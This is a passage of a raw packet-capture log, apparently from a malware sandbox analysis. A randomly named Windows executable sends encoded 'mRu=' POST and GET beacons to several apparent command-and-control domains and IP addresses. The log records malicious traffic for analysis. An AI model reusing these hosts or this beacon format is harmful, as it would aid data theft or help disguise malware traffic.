                                                                                                                            19192.168.11.2049738203.161.49.193802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:09.799015045 CET5156OUTPOST /cadc/ HTTP/1.1
                                                                                                                            Host: www.futurevision.life
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.futurevision.life
                                                                                                                            Referer: http://www.futurevision.life/cadc/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 45 35 31 42 5a 74 50 35 48 59 48 56 4f 50 30 76 58 56 4d 33 71 58 53 6a 4d 43 33 5a 50 48 39 44 52 42 58 32 4d 39 41 71 4a 78 73 6c 4d 79 51 73 78 79 48 36 68 51 2f 61 2b 71 49 47 43 65 68 41 6b 4e 49 79 37 4f 52 55 42 6d 5a 64 55 77 45 75 6c 4f 67 46 51 32 31 30 79 56 39 78 58 77 63 4e 68 71 50 73 49 48 56 4c 45 5a 32 4f 2b 37 64 50 65 70 39 50 46 41 43 6c 31 53 74 55 50 49 2f 6d 37 32 32 34 61 56 33 30 39 62 57 49 7a 78 4d 6b 6e 55 47 79 2f 61 38 35 79 79 68 44 53 39 62 2f 4d 4d 71 50 61 2f 67 42 4d 33 56 33 6b 56 72 79 45 77 4f 32 58 70 2f 62 4d 4f 59 75 62 78 37 6b 54 57 35 49 37 57 37 4d 5a 42 7a 73 58 73 79 41 6d 6e 77 65 68 78 56 55 52 73 71 78 64 4f 32 32 36 6c 31 31 45 4d 5a 34 49 38 39 74 4a 65 37 57 73 4d 4d 76 70 65 5a 49 67 55 76 39 56 36 47 65 4a 79 43 4f 44 4d 7a 34 66 67 32 74 4c 73 51 2b 32 39 38 5a 67 79 63 2b 41 50 53 34 36 58 41 77 67 51 59 4e 59 70 6c 46 57 2b 6b 6f 58 74 42 61 48 74 49 69 55 57 34 7a 49 75 75 45 35 56 4d 6e 67 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=/dZgz2HIhZFxdE51BZtP5HYHVOP0vXVM3qXSjMC3ZPH9DRBX2M9AqJxslMyQsxyH6hQ/a+qIGCehAkNIy7ORUBmZdUwEulOgFQ210yV9xXwcNhqPsIHVLEZ2O+7dPep9PFACl1StUPI/m7224aV309bWIzxMknUGy/a85yyhDS9b/MMqPa/gBM3V3kVryEwO2Xp/bMOYubx7kTW5I7W7MZBzsXsyAmnwehxVURsqxdO226l11EMZ4I89tJe7WsMMvpeZIgUv9V6GeJyCODMz4fg2tLsQ+298Zgyc+APS46XAwgQYNYplFW+koXtBaHtIiUW4zIuuE5VMng8wWQY/wcbf9YFQmdUbndFDrUyM+60QP4VlzeoN+FAZuY8aFywo3590bnv+ztbRp3N6Mg9X3pyBgr/ofeyh3owJXE66WfoL4LEBifKcv5USdxK6sCeYoqH2VqWJaDCHnKIWa1GSO6a5ljnRrhsJ+ElnSXcYpmwSWKQ6xdEGsZA0OS4xhmXJLqZNtGyYeVRzKNMHYRvJgbpD27k/YH23Ix5g9H3HbrdLMuNN/xJWZ3e1p1Alc+lcSINWeJ+uUu7Ucgdo9knqoBoc+/9EbRP0SBa4F2n2cSUZ8qOSqSl6SPaOq5ypjIHgN2RH6QCrxaCG4pBPD3lWXPO0RyfPB2vkWx2IQsDfeOji7VVqiBBjc7P8IaiGCAnptc4o6N+rbyIuHgamd7R2WwJGJm9YmgFSkrKLC0iSphOtJ0WLI5m57sl/Y2AAWBC7ZOuFv5jUP4mdjZ7H7YEwHIw/evOZpP8px23KzlYEren73r13u26rgM6bvbbxu6HXPcRbjEsEWobqGnxxtCyYCd2q/gM5HVSoYyvSnTnPhO91WCXMk82b07MjFIFLGAAFtCcoBHdgNvQoIWEm9EUzDOi5/2kNAIaIwsGrMtP91MVy8fuBxXicuFqBVxhl/vnFaOw3l5V/aqbHp2SJCv+GisuEXp/KQaDz9VylIAeuY0z+GP8d [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:31:09.799062014 CET1289OUTData Raw: 41 2f 57 44 39 42 39 4f 4d 6b 6f 69 50 76 78 38 48 45 51 53 52 30 69 41 2f 53 2b 37 4f 58 4c 52 76 55 37 77 6e 4e 59 52 50 6e 37 67 41 45 66 4f 65 73 6f 74 57 72 51 71 58 49 45 36 57 6a 41 38 35 54 7a 56 73 2f 50 6e 49 62 62 31 53 73 69 39 6e 4a
                                                                                                                            Data Ascii: A/WD9B9OMkoiPvx8HEQSR0iA/S+7OXLRvU7wnNYRPn7gAEfOesotWrQqXIE6WjA85TzVs/PnIbb1Ssi9nJK49xx5sfmsuWLFDfUeDEpiWSxN5aK4VUeW0ZLlDKLOaue5oRCGWquOOlqelnTlc9tELENbkHXH2Rrzt4dHBdKvxVG5UQVt1/Qqz+6ciavKomGJX4q1vaimsjcyB9aJAqfPpV3kL6DHbqvHsdQ96WEO75j/LGSmKzC
                                                                                                                            Nov 12, 2024 15:31:09.799108028 CET1486OUTData Raw: 4e 54 4e 65 42 43 72 6e 67 2f 6c 55 71 61 79 63 2f 59 64 41 56 36 50 43 4e 4a 74 49 72 75 49 6c 48 63 79 44 56 54 38 55 4f 75 38 63 51 6b 2f 36 41 41 36 49 63 30 6f 62 2f 44 47 64 6b 6b 62 69 38 54 56 37 56 6e 34 6c 71 37 4a 66 4d 2b 36 4c 6c 6d
                                                                                                                            Data Ascii: NTNeBCrng/lUqayc/YdAV6PCNJtIruIlHcyDVT8UOu8cQk/6AA6Ic0ob/DGdkkbi8TV7Vn4lq7JfM+6LlmeDvHDG4BtJle2vkbEtAVoRGjFdnbv5pT6niwh8CMnZi3pulXsDbmYyRFoq+Sdefg4CghuMiqAVBswmzp3SvI5wFH0atX4VZDitAQQ63GWvfyUh52iRikzSNjvx/lqDnUP5mUylkcoon5SKH9Z69CzG25gZiYNbPN1
                                                                                                                            Nov 12, 2024 15:31:10.014020920 CET533INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:31:09 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            20192.168.11.2049739203.161.49.193802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:12.503294945 CET480OUTGET /cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.futurevision.life
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:31:12.685394049 CET548INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:31:12 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            21192.168.11.204974013.248.169.48802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:18.017143011 CET750OUTPOST /a18n/ HTTP/1.1
                                                                                                                            Host: www.dreampay.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.dreampay.shop
                                                                                                                            Referer: http://www.dreampay.shop/a18n/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 54 38 41 75 72 4e 34 48 57 6e 4d 6b 78 36 4e 35 4a 74 32 55 32 67 33 47 63 76 55 43 68 49 75 48 50 32 37 51 6f 6b 63 4d 47 4c 38 58 50 45 64 70 69 58 35 77 5a 52 4a 49 6e 37 31 4b 4d 69 65 6e 6f 54 4a 65 36 61 48 72 74 75 46 43 63 75 4f 7a 61 77 56 30 38 66 35 78 44 53 41 65 4b 59 4f 33 64 79 4b 71 75 4c 55 30 51 4f 6d 76 6f 69 4a 41 36 66 78 61 45 30 2b 68 61 56 47 48 44 75 57 74 4a 57 30 42 4a 59 48 70 41 70 51 67 43 58 50 32 39 44 62 4b 49 68 58 70 79 48 30 44 6a 36 79 4c 41 32 4e 64 35 30 43 76 36 62 6b 44 37 54 52 68 55 45 2f 74 73 51 3d 3d
                                                                                                                            Data Ascii: mRu=LPwHkIfPMUlaT8AurN4HWnMkx6N5Jt2U2g3GcvUChIuHP27QokcMGL8XPEdpiX5wZRJIn71KMienoTJe6aHrtuFCcuOzawV08f5xDSAeKYO3dyKquLU0QOmvoiJA6fxaE0+haVGHDuWtJW0BJYHpApQgCXP29DbKIhXpyH0Dj6yLA2Nd50Cv6bkD7TRhUE/tsQ==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            22192.168.11.204974113.248.169.48802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:20.691129923 CET770OUTPOST /a18n/ HTTP/1.1
                                                                                                                            Host: www.dreampay.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.dreampay.shop
                                                                                                                            Referer: http://www.dreampay.shop/a18n/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 63 2f 59 75 6e 4b 55 48 65 6e 4d 6a 76 4b 4e 35 48 4e 32 51 32 67 7a 47 63 71 74 48 67 2b 47 48 49 55 54 51 72 6c 63 4d 42 4c 38 58 58 55 64 6f 6d 58 35 37 5a 52 30 39 6e 2b 56 4b 4d 6d 2b 6e 6f 58 4e 65 36 74 72 6f 72 2b 46 41 58 4f 4f 4c 56 51 56 30 38 66 35 78 44 53 45 30 4b 59 47 33 64 42 43 71 38 35 38 33 54 4f 6d 75 76 69 4a 41 72 50 77 52 45 30 2f 4d 61 58 2b 68 44 74 75 74 4a 55 73 42 48 71 6a 75 50 70 51 6d 47 58 50 6b 39 52 6e 47 50 51 76 64 33 52 34 2f 75 71 6d 72 46 67 41 48 6b 47 32 4c 35 49 34 78 2f 6a 6f 4a 57 47 2b 32 78 66 70 31 31 6b 35 58 45 68 56 4d 43 59 6d 4d 56 47 71 50 68 66 45 3d
                                                                                                                            Data Ascii: mRu=LPwHkIfPMUlac/YunKUHenMjvKN5HN2Q2gzGcqtHg+GHIUTQrlcMBL8XXUdomX57ZR09n+VKMm+noXNe6tror+FAXOOLVQV08f5xDSE0KYG3dBCq8583TOmuviJArPwRE0/MaX+hDtutJUsBHqjuPpQmGXPk9RnGPQvd3R4/uqmrFgAHkG2L5I4x/joJWG+2xfp11k5XEhVMCYmMVGqPhfE=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            23192.168.11.204974213.248.169.48802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:23.361154079 CET2578OUTPOST /a18n/ HTTP/1.1
                                                                                                                            Host: www.dreampay.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.dreampay.shop
                                                                                                                            Referer: http://www.dreampay.shop/a18n/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 4c 50 77 48 6b 49 66 50 4d 55 6c 61 63 2f 59 75 6e 4b 55 48 65 6e 4d 6a 76 4b 4e 35 48 4e 32 51 32 67 7a 47 63 71 74 48 67 2b 2b 48 50 6e 72 51 74 32 6b 4d 41 4c 38 58 4a 45 64 6c 6d 58 35 6d 5a 52 73 35 6e 2b 4a 38 4d 67 79 6e 70 79 5a 65 38 59 66 6f 69 2b 46 41 59 75 4f 77 61 77 56 62 38 66 70 4c 44 53 30 30 4b 59 47 33 64 48 6d 71 2f 72 55 33 56 4f 6d 76 6f 69 4a 4d 36 66 78 32 45 30 6d 35 61 58 37 63 43 63 4f 74 49 30 38 42 4b 35 48 75 47 70 51 6b 4c 33 4f 33 39 52 71 59 50 54 62 37 33 55 74 59 75 72 2b 72 4a 56 6c 44 37 47 2f 53 6d 6f 41 50 35 43 49 57 42 45 75 78 30 73 52 55 6c 6b 78 35 50 55 52 35 4e 49 6e 45 49 56 75 50 30 4b 2f 43 61 54 34 50 75 44 6b 4f 45 64 70 63 45 33 42 42 32 32 47 46 31 45 68 55 4d 6f 72 56 56 39 64 6e 6c 78 6f 38 70 50 43 6c 72 75 78 4b 6e 38 77 74 4a 56 33 73 5a 45 75 2b 4a 33 31 63 36 77 45 78 2b 2b 66 78 63 6a 48 4e 68 34 70 51 30 71 2b 56 44 57 51 2b 70 6b 75 2b 2b 74 4b 51 30 6f 63 38 52 4f 58 53 65 67 50 53 43 6b 68 63 68 78 5a 46 2b 6a 65 4c 6c 59 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=LPwHkIfPMUlac/YunKUHenMjvKN5HN2Q2gzGcqtHg++HPnrQt2kMAL8XJEdlmX5mZRs5n+J8MgynpyZe8Yfoi+FAYuOwawVb8fpLDS00KYG3dHmq/rU3VOmvoiJM6fx2E0m5aX7cCcOtI08BK5HuGpQkL3O39RqYPTb73UtYur+rJVlD7G/SmoAP5CIWBEux0sRUlkx5PUR5NInEIVuP0K/CaT4PuDkOEdpcE3BB22GF1EhUMorVV9dnlxo8pPClruxKn8wtJV3sZEu+J31c6wEx++fxcjHNh4pQ0q+VDWQ+pku++tKQ0oc8ROXSegPSCkhchxZF+jeLlYFkE314KeBwgTw1NOT5T9zvzkGlQroOUN3ee6cieFHT85YMug3OUfUXBDsHTYiAFmNOFFJpaLN9IFQTwRa340/W9jqIYy6SByu3X+B1tRKFLTsgYBEpIWsCT3KYGb4lTfQoJTXngHmasIPabPQn2oVQJll2H0XpS2ZCnPKxLtRB8YzFP3Sg5anPbjPKWktICB4ZbXL77MQB0m1aHQ3u6pOzdl2614XHW69H5WodGlOob2LHLJEHxvAaeOKgoNoVcRKvD0qYl48AGsJ+ophGGMDu5TMpqQ8WfCIdzImuiOutbdIsTZyyEJz4/Ubf2QU4zAp7W2tPE9vEXXWt2CrCzcJlAY/elsmlFi+/eK9LffHQDolwgDRpLVWL4Ceu4UEX79HSupVmO8yCPHtVIek16K3fmglkTJdOeC3Hs1cg5mxKxogXEuEIcaFwHq/JxrD0vE4QCZD894E08Z72nuqzTVI7ujItaurk63QB3FXwoNBEzODBML/l8pzliFibj1UfsmjqSSb1/58/rVEx7blWlH73tF9AO+F0RpHEkaTaAt4MEbz2tOzUGwewNxqjStgA1yF2COfjDkl0Kbi02fHhwNl5bq+vdC2oftE8IwOTD3qVwNvN0BbDBwMNQolnBTBm4zpzZC5fRlLCGOwjmQOLvZe2n61P3p2LJ6IU [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:31:23.361177921 CET1289OUTData Raw: 75 53 44 71 73 71 78 38 6a 6f 68 56 56 37 73 69 57 56 66 58 42 39 37 2f 30 39 73 65 2b 4e 43 52 4e 67 6b 53 6e 55 55 33 57 75 62 68 76 44 59 77 4d 70 66 53 63 64 2f 34 69 79 6d 45 75 76 61 47 57 38 62 38 71 58 65 63 56 59 65 41 75 34 46 35 7a 37
                                                                                                                            Data Ascii: uSDqsqx8johVV7siWVfXB97/09se+NCRNgkSnUU3WubhvDYwMpfScd/4iymEuvaGW8b8qXecVYeAu4F5z7O3Q5JNLTuZlmkdjBDP5IIvq0iliDZsbfPsGzt+zXyF0rpTTB7NnInVeWyIRoc4ASl65MhSDdcPR70jxRAxL/Erg4HPSO9GaS1Z62TSqBMyfjJSrb+DBHqVLospLwDDIYK60w/Vj5AsNZldnQMBKvCTEGKjnbsZVEY
                                                                                                                            Nov 12, 2024 15:31:23.361257076 CET4052OUTData Raw: 6b 2f 53 39 4d 2f 4a 32 4e 57 34 69 51 35 48 70 6a 56 50 6e 7a 39 70 33 30 7a 53 4d 55 50 67 74 4e 4a 63 41 33 32 39 67 76 49 78 36 55 62 6f 73 54 46 55 74 75 46 4e 51 43 76 4c 36 69 64 6f 72 57 61 50 54 59 58 43 5a 72 46 6b 31 54 56 61 65 67 45
                                                                                                                            Data Ascii: k/S9M/J2NW4iQ5HpjVPnz9p30zSMUPgtNJcA329gvIx6UbosTFUtuFNQCvL6idorWaPTYXCZrFk1TVaegEHg80fjcCZORIMHwFh5PNsjA381OEwpztyzOZu6KrlfrDouU9tXpUEo8/2u9wkbUZd62JEzM1j1BG/SU8DWYxPEud5ZJxa2wmoyWcfGpGel8g4m04MbPlSgDb/Sqw6u6QXp2RRe77cV8spw9u19evyV8PIZTWpqgxf


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            24192.168.11.204974313.248.169.48802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:26.033469915 CET476OUTGET /a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.dreampay.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:31:26.173508883 CET388INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Tue, 12 Nov 2024 14:31:26 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 248
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 47 4e 59 6e 6e 2b 2f 48 64 79 56 38 64 75 52 4d 71 74 63 79 58 6d 30 78 79 36 41 35 52 37 4f 50 30 67 33 71 51 73 78 6c 69 2b 72 63 49 57 54 31 34 7a 52 55 44 71 67 78 4e 52 41 7a 6f 6c 63 65 63 48 38 79 75 39 41 4b 4b 41 61 6b 34 53 64 53 79 5a 36 52 76 49 64 41 56 74 32 51 55 54 31 49 77 4e 6c 50 42 41 6f 43 64 38 43 78 58 68 66 38 75 75 59 72 56 4e 63 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            25192.168.11.2049744173.255.194.134802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:31.523771048 CET741OUTPOST /wie9/ HTTP/1.1
                                                                                                                            Host: www.jigg.space
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.jigg.space
                                                                                                                            Referer: http://www.jigg.space/wie9/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 76 39 58 55 58 59 72 4b 59 77 33 76 4e 65 39 6d 31 52 42 71 6d 53 6c 6a 32 2b 4e 7a 52 57 49 31 33 71 31 64 4e 7a 2b 73 78 48 4a 78 65 73 66 76 4f 38 31 76 50 47 62 4f 4a 67 4e 42 6d 53 67 71 78 48 59 51 51 2f 73 32 74 50 52 76 74 74 59 4f 75 58 4b 7a 59 51 49 6e 6a 57 66 36 5a 2b 45 64 76 69 57 50 53 4a 4d 63 39 51 5a 57 31 58 41 67 66 31 6f 2f 43 4d 53 7a 5a 7a 56 59 4f 54 58 6f 49 30 66 77 31 68 66 67 48 47 70 71 71 46 74 73 71 34 73 39 56 48 38 47 46 77 30 69 6e 79 65 30 46 5a 72 6c 4c 4f 44 77 63 38 36 72 6c 71 68 57 2b 52 6f 6e 41 3d 3d
                                                                                                                            Data Ascii: mRu=oJTv8AFgQV3Ebv9XUXYrKYw3vNe9m1RBqmSlj2+NzRWI13q1dNz+sxHJxesfvO81vPGbOJgNBmSgqxHYQQ/s2tPRvttYOuXKzYQInjWf6Z+EdviWPSJMc9QZW1XAgf1o/CMSzZzVYOTXoI0fw1hfgHGpqqFtsq4s9VH8GFw0inye0FZrlLODwc86rlqhW+RonA==
                                                                                                                            Nov 12, 2024 15:31:31.657979012 CET759INHTTP/1.1 403 Forbidden
                                                                                                                            server: openresty/1.13.6.1
                                                                                                                            date: Tue, 12 Nov 2024 14:31:31 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 577
                                                                                                                            x-fail-reason: Bad Actor
                                                                                                                            connection: close
